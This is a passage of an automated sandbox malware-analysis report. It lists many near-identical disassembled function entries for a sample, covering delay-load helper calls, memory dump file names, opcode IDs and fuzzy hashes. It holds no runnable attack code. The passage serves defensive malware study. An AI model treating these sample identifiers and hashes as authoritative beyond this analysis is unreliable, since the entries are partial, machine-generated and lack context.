                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: b882a2cfe648e1eba1cf6c3f18a87e9c7ba62a1119d9a6ec487347c9badaed48
                                                                                              • Instruction ID: 111a2936c557571952f65fb8e3a9ceb3f84abaa618bfeed0ce967655aa3f9f1d
                                                                                              • Opcode Fuzzy Hash: b882a2cfe648e1eba1cf6c3f18a87e9c7ba62a1119d9a6ec487347c9badaed48
                                                                                              • Instruction Fuzzy Hash: 7DB012C32580447D3644916A6C46E7B012CC1C8B14331C0BEF81CC50C0E8400C001433
                                                                                              Function 00C7E5A7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00C7E580
                                                                                                • Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
                                                                                                • Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: b5778b0f8d4cf65958e9463859722f205aede210687d4f44f20526a604fdcf0f
                                                                                              • Instruction ID: 95f19c49d7a4d4b8c39b92e68b0ea7740f47eb4ef18dc928f0e84bf913c60b45
                                                                                              • Opcode Fuzzy Hash: b5778b0f8d4cf65958e9463859722f205aede210687d4f44f20526a604fdcf0f
                                                                                              • Instruction Fuzzy Hash: BBB012C32580407C3644916BAD4AE3B013CC1C9B14334C2BEF41CC50C0EC400D011432
                                                                                              Function 00C7E5B1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00C7E580
                                                                                                • Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
                                                                                                • Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: ff2b8cdd5c6da74da1db5015f46be414e6a960739e4390ffd0853b819360622a
                                                                                              • Instruction ID: 0940c2d592dcf7f40038d80230a4e6e7366e35ae73890f9664326acea7febf2f
                                                                                              • Opcode Fuzzy Hash: ff2b8cdd5c6da74da1db5015f46be414e6a960739e4390ffd0853b819360622a
                                                                                              • Instruction Fuzzy Hash: 2DB012C32581407C3684916AAC4BE3B013CC1C9B14334C2BEF41CC50C0E8400C401432
                                                                                              Function 00C7E546 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00C7E51F
                                                                                                • Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
                                                                                                • Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 033ec602613d3accbd42a1a6c8035042e7ee12e3f2525a6fcf3b7496b3db39c7
                                                                                              • Instruction ID: 95cfc6cc663f14d8a99781191727f14ca873d30a8fd11f179caf61547e6b6347
                                                                                              • Opcode Fuzzy Hash: 033ec602613d3accbd42a1a6c8035042e7ee12e3f2525a6fcf3b7496b3db39c7
                                                                                              • Instruction Fuzzy Hash: 59B012C3258140BC3744510DAD0BE3B061CC1CAF14330C27EF41CC00C0E8400C441432
                                                                                              Function 00C7E50D Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00C7E51F
                                                                                                • Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
                                                                                                • Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 3d08f2162ce5cd2c0cd6e5ca383176de65bc06ce3b26cea66c5ce15d835b2430
                                                                                              • Instruction ID: b7b196bb623ca79561d3f099a5712f4308a79fa9cc255dc2a76d732c50ccb8ad
                                                                                              • Opcode Fuzzy Hash: 3d08f2162ce5cd2c0cd6e5ca383176de65bc06ce3b26cea66c5ce15d835b2430
                                                                                              • Instruction Fuzzy Hash: D9B012D3258140BC360411296D0AE3B021CC1C5F14330C07EF428C04C1A8410D041432
                                                                                              Function 00C7E528 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00C7E51F
                                                                                                • Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
                                                                                                • Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 37324a6ab280cf81aba10d06fb1fac4a120e5595838268552c9c5623b7519ced
                                                                                              • Instruction ID: 418e198559aacf6ea4e3f0f8f1f72fb2ceb59070254ceacdf47d843b95056779
                                                                                              • Opcode Fuzzy Hash: 37324a6ab280cf81aba10d06fb1fac4a120e5595838268552c9c5623b7519ced
                                                                                              • Instruction Fuzzy Hash: DBB012C3258080BC3644510D6E06E3B071CC1C9F14330C07EF81CC00C0EC410C011433
                                                                                              Function 00C7E532 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00C7E51F
                                                                                                • Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
                                                                                                • Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: f83f817ef7d3b434f0ce1c0ad9d338c04012a23a69f8eb750796d9e355a30cb6
                                                                                              • Instruction ID: adae66e1da08e56c80bfa910efd680c6d8f9dce33955328ed6e3f84408da7e2c
                                                                                              • Opcode Fuzzy Hash: f83f817ef7d3b434f0ce1c0ad9d338c04012a23a69f8eb750796d9e355a30cb6
                                                                                              • Instruction Fuzzy Hash: D1B012C3258040BD3644510D6D06F3B021CC1C9F14330C07EF81CC00C0EC400C001433
                                                                                              Function 00C7E2C3 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00C7E1E3
                                                                                                • Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
                                                                                                • Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: b9f17482b25d687fbdf4b9e650280acdc7186aa163f4bf524fba1d9516657ca2
                                                                                              • Instruction ID: bb0ffb1d7fdb578cd430d76eee1ea53a9cd61bb0ce407f1a409bdfdf4ea730d5
                                                                                              • Opcode Fuzzy Hash: b9f17482b25d687fbdf4b9e650280acdc7186aa163f4bf524fba1d9516657ca2
                                                                                              • Instruction Fuzzy Hash: 6BA001E72AD142BD7A08A2566D4BD3B021DC5C9B65371C9BEF82AC54C2A89068456872
                                                                                              Function 00C7E2CD Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00C7E1E3
                                                                                                • Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
                                                                                                • Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: c1351972046e76e3a7834ce4d79116ee5a4f2a6880ebe7854d56747d590a405c
                                                                                              • Instruction ID: bb0ffb1d7fdb578cd430d76eee1ea53a9cd61bb0ce407f1a409bdfdf4ea730d5
                                                                                              • Opcode Fuzzy Hash: c1351972046e76e3a7834ce4d79116ee5a4f2a6880ebe7854d56747d590a405c
                                                                                              • Instruction Fuzzy Hash: 6BA001E72AD142BD7A08A2566D4BD3B021DC5C9B65371C9BEF82AC54C2A89068456872
                                                                                              Function 00C7E2D7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00C7E1E3
                                                                                                • Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
                                                                                                • Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 650609d4af23ed3e27d904d10504575426dbec5d997a6e78b3be9db4e486d790
                                                                                              • Instruction ID: bb0ffb1d7fdb578cd430d76eee1ea53a9cd61bb0ce407f1a409bdfdf4ea730d5
                                                                                              • Opcode Fuzzy Hash: 650609d4af23ed3e27d904d10504575426dbec5d997a6e78b3be9db4e486d790
                                                                                              • Instruction Fuzzy Hash: 6BA001E72AD142BD7A08A2566D4BD3B021DC5C9B65371C9BEF82AC54C2A89068456872
                                                                                              Function 00C7E291 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00C7E1E3
                                                                                                • Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
                                                                                                • Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: a9324f7c83a94472d7a450b6d788506c5ed5b5b105bf2661de91d1a3699a09a5
                                                                                              • Instruction ID: bb0ffb1d7fdb578cd430d76eee1ea53a9cd61bb0ce407f1a409bdfdf4ea730d5
                                                                                              • Opcode Fuzzy Hash: a9324f7c83a94472d7a450b6d788506c5ed5b5b105bf2661de91d1a3699a09a5
                                                                                              • Instruction Fuzzy Hash: 6BA001E72AD142BD7A08A2566D4BD3B021DC5C9B65371C9BEF82AC54C2A89068456872
                                                                                              Function 00C7E29B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00C7E1E3
                                                                                                • Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
                                                                                                • Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 8d866e6ac42cd1039b407a626f0d5ba019044f280afdddeb4094a18e8c3bc488
                                                                                              • Instruction ID: bb0ffb1d7fdb578cd430d76eee1ea53a9cd61bb0ce407f1a409bdfdf4ea730d5
                                                                                              • Opcode Fuzzy Hash: 8d866e6ac42cd1039b407a626f0d5ba019044f280afdddeb4094a18e8c3bc488
                                                                                              • Instruction Fuzzy Hash: 6BA001E72AD142BD7A08A2566D4BD3B021DC5C9B65371C9BEF82AC54C2A89068456872
                                                                                              Function 00C7E2A5 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00C7E1E3
                                                                                                • Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
                                                                                                • Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: e62e237ce6a2e57402a709871d657661f860b68d5d528fc3f39c67063ecdd7ad
                                                                                              • Instruction ID: bb0ffb1d7fdb578cd430d76eee1ea53a9cd61bb0ce407f1a409bdfdf4ea730d5
                                                                                              • Opcode Fuzzy Hash: e62e237ce6a2e57402a709871d657661f860b68d5d528fc3f39c67063ecdd7ad
                                                                                              • Instruction Fuzzy Hash: 6BA001E72AD142BD7A08A2566D4BD3B021DC5C9B65371C9BEF82AC54C2A89068456872
                                                                                              Function 00C7E2AF Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00C7E1E3
                                                                                                • Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
                                                                                                • Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 660f131768448a5ae0db13d22a024c7afe2d08b6bab4eac9f357bf7367090d2e
                                                                                              • Instruction ID: bb0ffb1d7fdb578cd430d76eee1ea53a9cd61bb0ce407f1a409bdfdf4ea730d5
                                                                                              • Opcode Fuzzy Hash: 660f131768448a5ae0db13d22a024c7afe2d08b6bab4eac9f357bf7367090d2e
                                                                                              • Instruction Fuzzy Hash: 6BA001E72AD142BD7A08A2566D4BD3B021DC5C9B65371C9BEF82AC54C2A89068456872
                                                                                              Function 00C7E2B9 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00C7E1E3
                                                                                                • Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
                                                                                                • Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
